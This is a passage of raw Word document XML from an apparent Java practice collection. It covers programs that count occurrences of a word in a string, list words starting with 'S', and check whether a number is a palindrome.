          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to return the number of occurrences for a given word in the string.</w:t>
      </w:r>
      <w:r w:rsidR="00D10C97" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8168E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Accept the inputs from the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC65A36" w14:textId="7BF8B7A2" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38064236"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p>
    <w:p w14:paraId="6326F1C0"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functio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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68152E4F"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ollectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E8B8E"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C8DEB"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WordOccurrenceCount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9BD4737"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61D076"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C8723A5"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scann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canner</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176F568C"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557F807"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Accept input string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2DCBD"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Enter a string: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B2157"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inpu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cann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extLine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EAE8EA"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF61879"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Accept the word to search for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815AE08"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Enter the word to find: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C214BE"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wordToFin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canner</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x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LowerCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA27A77"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640FEFA"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plit input string into words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068264D6"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o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ordCou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LowerCas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pli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W+"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53631911"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il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word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wor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Empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC58B47"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llec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ollecto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roupingBy</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Func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dentit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ollecto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unting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047CDE11"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455FD94A"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Get the count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FBEAF"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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cou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ordCou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OrDefaul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wordToFin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L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2E80A"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC7E68"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Occurrences of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ordToFin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ount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA2D27" w14:textId="77777777"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C2B4C11" w14:textId="3DC582BD" w:rsidR="00704FF1" w:rsidRPr="00CE4B95"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3BB513D5" w14:textId="77777777" w:rsidR="00704FF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00704FF1" w:rsidP="00704FF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE82172" w14:textId="3C3EF7F2" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="_Toc196307822"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0098350E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find the Words which starts with ‘S’</w:t>
      </w:r>
      <w:r w:rsidR="008B1FBB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from List of Words</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>
    </w:p>
    <w:p w14:paraId="442BDEA2" w14:textId="3F2F1B66" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A54C57D" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="212942A6" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEA60F" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C65596D" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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WordsStartingWith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7248B7A" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007C235" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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4B21A89" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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lis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iddha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Patn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Kota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Mahindr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Samsu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sun"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0C4D8" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7CA075" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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Words starting with 'S':"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37248A70" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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p>
    <w:p w14:paraId="0FDFADAD" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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il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word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or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artsWith</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316882A" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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orEach</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p>
    <w:p w14:paraId="62725D37" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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4D57A5F" w14:textId="7C5EFE2F" w:rsidR="006B46E6" w:rsidRPr="00CE4B95"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5B3D8DBD" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95" w:rsidRDefault="006B46E6" w:rsidP="006B46E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499D366F" w14:textId="39D430CC" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc196307823"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00F954C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Palindrome Number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w14:paraId="2F3E1166" w14:textId="74D4F888" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00DF111B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00DF111B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to check Palindrome number. Input : 59095</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E3E0F" w14:textId="5DECF0B6" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33519C97" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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IntStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1105D" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DB2E0" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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alindromeNumb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3941537" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FEB0A6" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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heck if a number is palindrome using Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBD00F" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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isPalindromeNumber</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umb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8F99DC0" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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umSt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valueOf</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umber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25A178" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Strea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ang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St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p>
    <w:p w14:paraId="4DB066D0" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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llMatc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numSt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harA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St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harA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umSt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p>
    <w:p w14:paraId="03651AD3" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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8C2BB49" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197C6EC" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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6B718AF" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693AE051" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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est numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC6F40" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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um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9095</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204AC56" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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um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2345</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68544105" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034F5E99" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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um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is Palindrome Number? -&g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sPalindromeNumb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um1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ECB7C6" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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um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is Palindrome Number? -&g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sPalindromeNumb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um2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252F682" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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3C79FF6" w14:textId="77777777" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F381A" w14:textId="2B412517" w:rsidR="00AD5F0D" w:rsidRPr="00CE4B95"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49FE0F5D" w14:textId="77777777" w:rsidR="00525D83" w:rsidRPr="00CE4B95" w:rsidRDefault="00525D83" w:rsidP="00525D83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E53ED0" w14:textId="3C902A86" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
